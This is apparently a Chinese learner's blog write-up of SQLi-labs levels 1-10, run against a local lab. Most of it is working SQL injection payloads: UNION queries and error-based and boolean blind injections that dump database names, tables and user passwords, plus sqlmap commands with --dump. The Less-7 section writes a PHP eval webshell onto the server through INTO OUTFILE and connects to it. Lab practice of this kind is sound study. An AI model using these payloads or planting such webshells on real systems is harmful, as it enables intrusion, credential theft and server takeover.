• sqlilabs_Less110


    一个人只要多笑,就会变得很幸福。

    前言:

    此文用于记录学习SQL注入过程中的所得所思,因为可以说是菜鸟了,需要参考大佬的解题方法,所以一切慢慢来吧,希望越来越强。

    做题过程中的各种知识

    1. 在mysql数据库中,单行注释有#--,在实际操作中#号一般用%23来表示。而--则用--+来表示。因为在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,而用--+代替-- ,原因是+在URL被URL编码后会变成空格。
    2. 与数据库相关的内容:
    • information_schema,系统数据库,包含所有数据库相关信息。
    • information_schema.schemata中schema_name列,字段为所有数据库名称。
    • information_schema.tables中table_name列对应数据库所有表名,其中table_schema列是所有数据库名。
    • information_schema.columns中,column_name列对应所有列名,其中table_schema列也对应所有数据库名,table_name列也对应所有表名。
    1. 联合查询时需要将前面的查询结果限定为空集,后面的查询结果才能显示出来。
    2. concat(),concat_ws()与及group_concat()的用法
    3. 其他相关知识点在文末附有相应链接,就不在这赘述了。

    Less-1

    手工UNION联合查询注入

    1. 根据题目提示,输入http://localhost:8088/sqlilabs/Less-1/?id=1显示正常。
    2. 加个单引号看看,http://localhost:8088/sqlilabs/Less-1/?id=1'显示语句出错。
    3. 通过 http://localhost:8088/sqlilabs/Less-1/?id=1' %23http://localhost:8088/sqlilabs/Less-1/?id=1'--+http://localhost:8088/sqlilabs/Less-1/?id=1' and '1'='1 可知,是单引号字符型注入。
    4. 下面开始构造语句,首先先了解相关的数据库内容:
    • information_schema,系统数据库,包含所有数据库相关信息。
    • information_schema.schemata中schema_name列,字段为所有数据库名称。
      SCHEMATA
    • information_schema.tables中table_name列对应数据库所有表名,其中table_schema列是所有数据库名。
      TABLES
    • information_schema.columns中,column_name列对应所有列名,其中table_schema列也对应所有数据库名,table_name列也对应所有表名。
      COLUMNS
    1. 使用order by查列数,order by语法为:ORDER BY column1 [ASC|DESC], column2 [ASC|DESC],... 此处以数字1,2,3...指定以某一列为key进行排序,通过尝试得出列数,得出列数为3。
    • order by 3时,http://localhost:8088/sqlilabs/Less-1/?id=1' order by 3 --+,正常:
    • order by 4时,http://localhost:8088/sqlilabs/Less-1/?id=1' order by 4 --+,出错:
    1. 接着进行联合注入,通过回显爆出表名,列名,字段,用户名和密码。
    2. 爆数据库名:http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+
    3. 爆当前security数据库的表:http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
    4. 爆user表的列:http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
    5. 爆所有用户名和密码: http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,group_concat(concat_ws(':',username,password)),3 from users --+
    • 或这样构造: http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

    使用sqlmap工具进行注入

    1. 各个参数就不一一说明了,请参考这篇文章:11种常见SQLMAP使用方法详解

    2. 首先,直接指定相关参数,如注入类型,数据库类型等: python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql --batch 得到相关信息。

    3. 开始注入,爆出数据库名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql --batch --dbs

    4. 爆出security中所有表名: python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql -D security --tables --batch

    5. 爆出users表中的所有字段:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns --batch

    6. 爆出用户信息:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch

    Less-2

    1. 首先http://localhost:8088/sqlilabs/Less-2/?id=1,正常。
    2. 加单引号http://localhost:8088/sqlilabs/Less-2/?id=1'出错提示为:

      可知单引号影响了闭合,为数字型注入。
    3. 也就是不添加单引号,也不需要注释了,直接在后面添加语句,进行联合查询,构造的语句均和Less-1一样。

    Less-3

    1. 加单引号http://localhost:8088/sqlilabs/Less-3/?id=1'出错:
    2. 由错误提示可知后台查询语句应为select * from * where id = ('$id') LIMIT 0,1
    3. 构造http://localhost:8088/sqlilabs/Less-3/?id=1') --+ 进行测试。访问正常,猜测正确。
    4. 接下来的语句构造同上。

    Less-4

    1. 加单引号http://localhost:8088/sqlilabs/Less-4/?id=1',正常。
    2. 考虑到语句中可能为双引号,加双引号试试http://localhost:8088/sqlilabs/Less-4/?id=1", 报错:use near '"1"") LIMIT 0,1' at line, 可知查询语句应该为select * from * where id = ("$id") LIMIT 0,1
    3. 如上,构造语句为http://localhost:8088/sqlilabs/Less-4/?id=1") --+, 访问正常,接下来的构造如上。

    Less-5

    1. 加单引号http://localhost:8088/sqlilabs/Less-5/?id=1',错误use near ''1'' LIMIT 0,1' at line 1,知闭合为单引号。
    2. 输入http://localhost:8088/sqlilabs/Less-5/?id=1'--+,显示依然如下:
    3. 页面出现SQL语句报错,在这可以使用:报错型盲注。构造原理与方法请参考这篇文章:详细讲解双查询注入
      还可用布尔型盲注、时间延迟型盲注等,它们都属于盲注,以后再尝试。
    4. 构造如下语句:http://localhost:8088/sqlilabs/Less-5/?id=2' and (select 1 from (select count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
    • 提示输出信息超过一行,说明这里数据库名组成的字符串长度超过了64位(group_concat()函数最大长度为64位),所以需要放弃group_concat()函数,而使用limit 0,1来一个个输出。
    • limit 0,1 表示输出第一个数据。 0表示输出的起始位置,1表示跨度为1(即输出几个数据,1表示输出一个,2就表示输出两个)
    1. 更改语句为:http://localhost:8088/sqlilabs/Less-5/?id=2' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+ 得到第一个数据库的名字为 information_schema
      注意: 0是拼接上去的,这个0由rand()函数产生,是floor报错语句中输出的一部分。
    • 为了方便查看,稍微改动语句:http://localhost:8088/sqlilabs/Less-5/?id=2' and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)--+ 如下:
    1. 继续爆其他数据库名,改变limit n,1即可:http://localhost:8088/sqlilabs/Less-5/?id=2' and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 1,1),floor(rand()*2)) as x from information_schema.tables group by x) as a) --+





      当显示下面的情况时,说明已经爆完。

    2. security数据库中的表:
      构造:http://localhost:8088/sqlilabs/Less-5/?id=2' and (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a) --+ 还是更换limit n,1一个一个爆出。




      下面说明已经爆完,同上。

    3. users表的列名:http://localhost:8088/sqlilabs/Less-5/?id=2' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit 0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+


    4. users表中的内容:
      用户名和密码为,同样,limit n,1慢慢来吧:http://localhost:8088/sqlilabs/Less-5/?id=2' and(select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)--+

    太多了,就不一一列举了。

    Less-6

    1. 加单引号,正常,加双引号,报错如下:
    2. 可知为闭合双引号出错,构造方法同上,这里尝试使用布尔型盲注:
    3. 先看数据库的版本, http://localhost:8088/sqlilabs/Less-6/?id=1" and 1=(if(substr(version(),1,1)=5,1,0))--+ 显示正常,说明数据库版面为5,就可以利用那个默认库information_schema了。
    4. 猜测数据库名,使用二分法。
    • 构造http://localhost:8088/sqlilabs/Less-6/?id=1" and substr(database(),1,1)>'a'-- 没报错,说明数据库名第一个大于a
    • 接着,构造为:http://localhost:8088/sqlilabs/Less-6/?id=1" and substr(database(),1,1)>'m'--+ 还是正常的,继续。
    • 选取z, http://localhost:8088/sqlilabs/Less-6/?id=1" and substr(database(),1,1)>'z'--+ 出错,无显示。
    • 所有考虑t ,也就是m和z的中间那个。http://localhost:8088/sqlilabs/Less-6/?id=1" and substr(database(),1,1)>'t'--+ 依然出错。
    • 就这样,一步一步试出第一个字母,得出为s
    1. 下一步,判断其长度:还是二分法,慢慢试,由http://localhost:8088/sqlilabs/Less-6/?id=1" and length(database())=8--+ 访问正常知共有8个字母。然后如上一个一个试,通过substr(database(),n,1)。其实得出前面几个便可猜出为何单词,这里即为security
    2. 下面是猜表名:http://localhost:8088/sqlilabs/Less-6/?id=1" and substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)='u' --+
    • 这里工作量更大了,因为security中有四张表,每张都有id属性,下面设为limit 3,1,猜测表users的第一个字母u时才不会出错(还有第三张表uagentslimit 2,1时猜测时也不会出错,所以得试好多次)
    • 当然,一般我们需要的应该都是users表,所以也可以直接尝试http://localhost:8088/sqlilabs/Less-6/?id=1" and substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,5)='users' --+
    1. 接着是列:构造类似,不一一说明:
    • 第一个属性为id ,已知
    • 第二个http://localhost:8088/sqlilabs/Less-6/?id=1" and substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,8)='username' --+username
    • 第三个为:http://localhost:8088/sqlilabs/Less-6/?id=1" and substr((select column_name from information_schema.columns where table_name='users' limit 2,1),1,8)='password' --+password
    1. 最后是内容:这就更复杂了,因为每个字母都需要猜,实际工作量是非常大的,由于目前水平有限,语句的构造和注入方法都是比较愚笨的,还不知道其他更好的方法,所以就先到这里了。

    Less-7

    1. 加单引号出现错误, 可以猜测 id 是一个单引号包裹的字符类型。但这样http://localhost:8088/sqlilabs/Less-7/?id=1' --+却是错的,所以考虑到可能有),于是http://localhost:8088/sqlilabs/Less-7/?id=1') --+ 还是错的,差点放弃了,最后得出http://localhost:8088/sqlilabs/Less-7/?id=1')) --+是正确的,所以可以这样构造攻击语句 ')) 攻击代码--+
    2. 通过group by 得知有三列。
    3. 由于本关卡提示使用file权限向服务器写入文件,先查看是否有写入权限。
      http://localhost:8088/sqlilabs/Less-7/?id=1')) and (select count(*) from mysql.user)>0--+ 返回正常,说明有写入权限。
    4. 试写入一个文件试试:http://localhost:8088/sqlilabs/Less-7/?id=-1')) union select 1,2,3 into outfile "F:\\tool\\phpstudy\\PHPTutorial\\WWW\\sqlilabs\\Less-7\\try.php"--+ 成功。

    注:有可能遇到遇到secure-file-priv问题 ,自己设置一下就好了。
    5. 现在写入webshell,http://localhost:8088/sqlilabs/Less-7/?id=-1')) union select 1,2,"<!--?php @eval($_POST['sql']);?-->" into outfile "F:\\tool\\phpstudy\\PHPTutorial\\WWW\\sqlilabs\\Less-7\\try1.php"--+

    6. 使用菜刀连接下:成功

    Less-8

    1. 加单引号,出错,加注释http://localhost:8088/sqlilabs/Less-8/?id=1' --+ 正常。可知为单引号闭合。
    2. 接下来和Less-5差不多,就是不能基于报错型盲注。因为没有回显内容,所以只能用布尔型盲注和时间延迟型盲注。
    3. 这里有个问题,其实在Less-1时就有疑问了,但Less-1有回显报错,所以不在意,到这就又有疑问了,就是当加双引号和注释http://localhost:8088/sqlilabs/Less-8/?id=1" --+和“双引号不加注释”时http://localhost:8088/sqlilabs/Less-8/?id=1" ,也是正确的,很奇怪。后来在命令行中尝试了 select * from users where id='1"' limit 0,1; 发现是可以通过的,又尝试了几个情况。


    通过上面的尝试发现,加双引号时,加不加注释其实都一样,因为MySQL把一个双引号当成两个单引号了,注释在引号中根本不起作用了,所以才会出现返回正常的情况。

    1. 和之前所说的一样,使用布尔型盲注和时间延迟型盲注是比较繁琐的,所以直接使用sqlmap进行注入:
      (1)布尔型盲注
    • 爆数据库名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql --dbs --batch --threads 10
    • 爆表名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql -D security --tables --batch --threads 10
    • 爆列名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql -D security -T users --column --batch --threads 10
    • 爆内容:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique B --dbms mysql -D security -T users -C username,password --dump --batch --threads 10
      (2)时间延迟型盲注(真难等)
    • 爆数据库名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql --dbs --batch
    • 爆表名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql -D security --tables --batch
    • 爆列名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql -D security -T users --column --batch
    • 爆内容:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-8/?id=1 --technique T --dbms mysql -D security -T users -C username,password --dump --batch

    Less-9

    1. 尝试使用单引号和双引号闭合(没有注释--+),发现页面回显一直正常,好迷。网上说把单双引号给退意了,不懂。
    2. 根据提示,为单引号时间延迟型盲注。
    3. 但感觉好像加什么都显示正常,不管了,直接用sqlmap跑吧。
    • 爆数据库名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql --dbs --batch
    • 爆表名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security --tables --batch
    • 爆列名:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security -T users --column --batch
    • 爆内容:python2 sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security -T users -C username,password --dump --batch

    Less-10

    1. 和Less-9一样,感觉输入什么都没有反应。
    2. 根据提示,为双引号时间延迟型盲注。
    3. 也是用sqlmap跑,就不多说了。

    参考:

    1. MySql DB Sql注入
    2. concat(),concat_ws()与及group_concat()的用法
    3. 11种常见SQLMAP使用方法详解
    4. 详细讲解双查询注入
    5. sqli-labs Less(1-35) 小结
    6. 基于时间型盲注和基于布尔型盲注
    感谢阅读,如有问题,请批评指正,谢谢。
  • 相关阅读:
    [置顶] Android自定义控件大全
    与机房收费系统图的初步情结
    队列用链表实现(建立,插入新元素,删除元素,读取元素,全部删除,全部读出,判断是否为空,清空)
    数据结构 练习 16-动态规划
    windows和linux在建筑python集成开发环境IDE
    圆角盒演习(1)
    tortoise svn无法识别subversion check向下代码来解决
    CSS+DIV+JQuery实际的视频汇总
    【Android开发经验】Android举UI设计经验
    程序猿什么样的角色代表了这个号码?你想过这个问题?
  • 原文地址:https://www.cnblogs.com/clwsec/p/15679956.html
Copyright © 2020-2023  润新知